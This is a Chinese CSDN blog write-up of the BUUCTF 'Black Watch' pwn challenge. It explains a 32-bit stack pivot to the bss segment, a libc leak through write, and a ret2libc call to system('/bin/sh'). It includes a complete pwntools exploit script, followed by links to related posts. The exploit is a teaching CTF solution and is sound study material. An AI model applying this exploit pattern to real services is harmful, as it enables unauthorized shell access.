【PWN · 栈迁移】[BUUCTF][Black Watch 入群题]PWN

最新推荐文章于 2024-03-11 21:34:08 发布
最新推荐文章于 2024-03-11 21:34:08 发布
阅读量354 收藏
点赞数 1
分类专栏: 【PWN · 高级栈相关】 文章标签: ctf pwn 栈迁移 stackoverflow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/132050180
版权

记一道栈迁移题目

前言

【PWN · 栈迁移】[BUUCTF]ciscn_2019_es_2_Mr_Fmnwon的博客-CSDN博客

一、代码审计

总结信息如下: 

1. 第12行存在栈溢出漏洞,刚好可以溢出覆盖到ebp和ret

2. 第9行可输入大量数据到bss段

二、思路过程

1.栈迁移

进能够覆盖ebp和ret,很难不往栈迁移上想。

修改ebp和ret后我们可以将栈指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发栈迁移的基本过程。

查看整个代码发现没有后门函数。

2.泄露libc

没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。

3.组合流程①

read大量数据,可以是

aaaa + write.plt + main_addr + p32(1) + write.got + p32(4) 

栈迁移后,栈顶被弹出,栈指针指向write.plt,调用write函数,参数为 (fd=1,write_real_addr,len),然后ret到main_addr,从头再次触发漏洞。

4.组合流程②

read大量数据,可以是

aaaa + system_addr + p32(0) + str_bin_sh

调用system('/bin/sh'),其中p32(0)仅为了占位

其中system和str_bin_sh通过泄露出来的write的地址得到libc版本,进而得到偏移量。

三、exp

from pwn import *
from pwn import u32,p32
from LibcSearcher import *

context.log_level='debug'
# context.terminal = ['tmux','splitw','-h']
io=process('./pwn')
# io=remote('node4.buuoj.cn',25236)9

elf=ELF('./pwn')

main_addr=0x08048513
bss_addr=0x0804A300
leave_ret=0x08048511

# gdb.attach(proc.pidof(io)[0],gdbscript="b main")
==========第一次触发漏洞
payload=b'a'*4+p32(elf.plt['write'])+p32(main_addr)+p32(1)+p32(elf.got['write'])+p32(6)
io.sendafter(b'name?',payload)
payload=b'a'*24+p32(bss_addr)+p32(leave_ret)
io.sendafter(b'say?',payload)
write_addr=u32(io.recv(4))
print(hex(write_addr))
==========泄露libc->泄露system地址、str_bin_sh地址
libc=LibcSearcher('write',write_addr)
write_bias=libc.dump('write')
system_bias=libc.dump('system')
bin_sh=libc.dump('str_bin_sh')
system_addr=write_addr-write_bias+system_bias
bin_sh_addr=write_addr-write_bias+bin_sh
==========第二次触发漏洞
payload=b'a'*4+p32(system_addr)+p32(0)+p32(bin_sh_addr)
io.sendafter(b'name?',payload)
payload=b'a'*24+p32(bss_addr)+p32(leave_ret)
io.sendafter(b'say',payload)
io.interactive()
Mr_Fmnwon
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn溢出10道练习有writeup
01-04
pwn溢出练习目,每都有writeup.
PWN门之迁移-附件资源
03-02
PWN门之迁移-附件资源
[BUUCTF]-PWN:ciscn_2019_es_2解析(迁移
2301_79326813的博客
12-11 1166
答:先说明一点,我们第二次构造payload时往ebp填ebp-0x38是为了让它在执行完函数原有的leave,ret之后ebp指向b'a'*4的头地址,但要注意这里不是输ebp-0x28,因为第一个printf打印出来的是ebp里的内容而不是ebp的地址,通过动态调试可以知道ebp里面的内容是ebp+0x10的地址,我们打印出来的就是ebp+10的地址,这里就要填ebp-0x38才能使ebp指向b'a'*4的头。答:首先要明白32位是通过传参的,这样的形式是32位的调用函数的调用规则。
PWN · 迁移】[CISCN 2019东南]PWN2
Mr_Fmnwon的博客
10-14 283
当存在溢出但是溢出字符数并不多的情况下,可以尝试在别处构造rop链,通过迁移到目标内存区域,执行rop链。这里不讲迁移原理,仅是对目的分析,适合对迁移有初步了解的童鞋食用。
PWN——迁移
L2329794714的博客
08-29 1483
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
[Black Watch ]PWN
m0sway的博客
11-24 1341
[Black Watch ]PWN 使用checksec查看: 只开启了不可执行,拉进IDA中查看: 直接给了漏洞函数,跟进看: 变量s里面可写0x200个字符,放在bss段中。变量buf里面可写0x20个字符,但是并不能溢出。 可以联想到迁移的方法,将迁移到变量s所在的bss段中,s里面放上payload 这没有system和/bin/sh,需要先进行libc泄露再getshell exp: from pwn import * #start r = remote("node4.b
BUUCTF-[Black Watch ]PWN
Fzuim的博客
04-14 364
常规检查下来,发现可以进行溢出,但是允许操作的空间只有8个字节… 看下ida伪代码 可操作空间很小,只能覆盖到eip,正常思路是:泄露write的got表地址,然后通过libcsearch找出system和bin/sh的地址,再次构造溢出攻击。此溢出只能操作8字节,一般思路行不通。此时就用到另一个概念:迁移!!! 迁移的关键点在于esp,能把esp重新指向另外一块内存空间,即可成功。这的另一块内存空间就是bss段。 利用到迁移,我们需要在原本的eip位置覆盖成 leave;r.
[BUUCTF]PWN——[Black Watch ]PWN
mcmuyanga的博客
10-26 2415
[Black Watch ]PWN——劫持 密码在 /password.txt Ubuntu 16 2020年02月27日:此已作废,请看新版。 附件 解步骤: 例行检查,32位程序,开启了nx保护 运行一下程序,两次输,测试时发现输长度过长,会报错 32位ida载,首先shift+f12查看一下程序里的字符串,没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 从main函数开始看程序
[Black Watch ]PWN 劫持的利用
半岛铁盒的博客
08-17 320
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输的参数s,那边我们可以写很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输,利用站劫持,把程序的执行流程劫持到第一次输的位置就可以了 站劫持利用 做劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
warmup pwn
02-11
pwn
CTF-PWN-溢出-中级ROP-【迁移
llovewuzhengzi的博客
01-09 1267
所以此时的gadget应该是能够进行迁移的,即为待会要改到的rsp值+修改参数的gadget+read函数+leave_ret,此时由于想直接用程序内的gadget来构造参数,此时可以以原函数开始准备read函数调用的地址作为调用read函数地址,此时可以参数构造就不要担心需要找gadget或者直接利用read函数后rdi rsi rdx没有被修改的特点从而只修改rsi即可,正好存在这样的gadget(main函数ret结束前调用的最后一个函数是向bss段输数据)。
[Black Watch ]PWN-迁移
个人笔记
04-20 343
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出空间只有0x20-0x18=8字节无法构造rop,所以需要利用迁移技术,迁移到bss上构造rop。bss布局:(左边是第一泄露Libc构造帧,右边是第二次重写获取shell的帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。迁移操作:构造好中ebp新位置。思路:ret2shellcode。迁移关键指令:leave。
CTF[PWN]--迁移、格式化字符串漏洞、随机数撞库
2301_79880752的博客
03-11 735
开启NX,64位,动态编译,IDA分析:两次读,第一次读结束给了我们read函数的地址,第二次读可以溢出,但是只能覆盖一个返回地址,自然而然的想到了迁移,因为第一次给了我们地址,就可以通过偏移去求出第二次read读的起始地址由于本给了提示,用的是ubuntu 16.04,因此libc库应为libc2.23(后来才知道,由于之前做都是打本地,导致当时做这的时候本地脚本写的很快,但在连接远程libc时却花了大功夫)
[CTF]PWN--沙盒中的迁移构造read利用
2301_79880752的博客
02-26 1017
我们需要在调试中寻找read函数的返回地址,将其作为读的位置,因为我们后面要在这个构造的read函数中读orw,我们将orw写到read函数返回地址上,这样读之后就可以直接执行orw获取权限,为了使程序运行成功我们可以先随便写一个bss地址作为读位置。还记得我们一开始将读位置迁到bss段上了吗,连接远程时程序运行时的生成地址可能会改变,但是,内存(bss)是不会变的,因此本我们可以直接通过调试得到返回地址,而这个返回地址必然是bss段地址,也就是说在连接远程的时候是不会改变的。
Black_Watch__PWN
z1r0的博客
12-09 1223
Black_Watch__PWN 查看保护 有溢出,长度不够,又有s可以存放payload。所以迁移 用ebp和esp这两个跳板,控制eip顺利执行需要的payload。 leave_ret(mov esp, ebp; pop ebp;)用这个gadgets。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug:
[Black Watch ]PWN迁移
wuyvle的博客
02-22 197
进去康康函数结构 第二个read函数可以溢出但是可以构造的rop链很短 0x20-0x18 不过可以用第一个read构造ROP链,且刚好在bss段中,之后迁移到该地址执行,后面就是常规的泄露libc来getshell 迁移 首先来介绍一下迁移是什么? 以32位程序举例,在使用call这个命令,进一个函数的时候,程序会进行一系列操作: push eip+4; push ebp; mov ebp,esp; 这些操作是用来保护现场,避免执行完函数后堆不平衡以及找不到之前的口地址。 执行完函数后.
26. 基于视觉的道路识别技术的智能小车导航源代码.zip
最新发布
06-02
1.智能循迹寻光小车(原埋图+PCB+程序).zip 2.智能循迹小车程序.zip 3.智能寻迹小车c程序和驱动.zip 4. 智能小车寻迹(含霍尔测連)c程序,zip 5.智能小车完整控制程序,zip 6.智能小车黑线循迹、避障、遥控实验综合程序,zip 7.智能小车测速+12864显示 C程序,zip 8. 智能小车(循迹、避障、遥控、测距、电压检测)原理图及源代码,zip 9.智能灭火小车,zip 10,智能搬运机器人程序.zip 11.智能arduino小车源程序,z1p 12.-种基于STM32的语音蓝牙智能小车,zip 13.循迹小车决赛程序,zip 14.循迹小车51程序(超声波 颜色识别 舵机 步进电机 1602).zip 15.寻光小车,zip 16.小车测速程序,zip 17.五路循迹智能小车c源码.zip 18.无线小车原理图和程序,zip 19.四驱智能小车资料包(源程序+原理图+芯片手册+各模块产品手册).zip 20.4WD小车安装教程及程序,z1p 21.四路红外循迹小车决赛程序,zip 22,适合初学者借鉴的arduino智能小车代码集合,zip 23.脑电波控制小车,zip 24.蓝牙智能避障小车,zip 25.基于树莓派监控小车源码.zip 26.基于视觉的道路识别技术的智能小车导航源代码,zip 27.基于STM32F407的超声波智能跟随小车,zip 28.基于arduino的蓝牙智能小车,zip.zip 29.基于51的蓝牙智能小车,zip 30.基于51单片机的红外遥控控制小车程序,zip
ctfshow PWN 溢出
08-23
在ctfshow PWN中,溢出是一种常见的攻击方式。 根据提供的引用,我了解到溢出是一种通过向程序输过长的数据导致数据溢出的一种攻击手段。是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值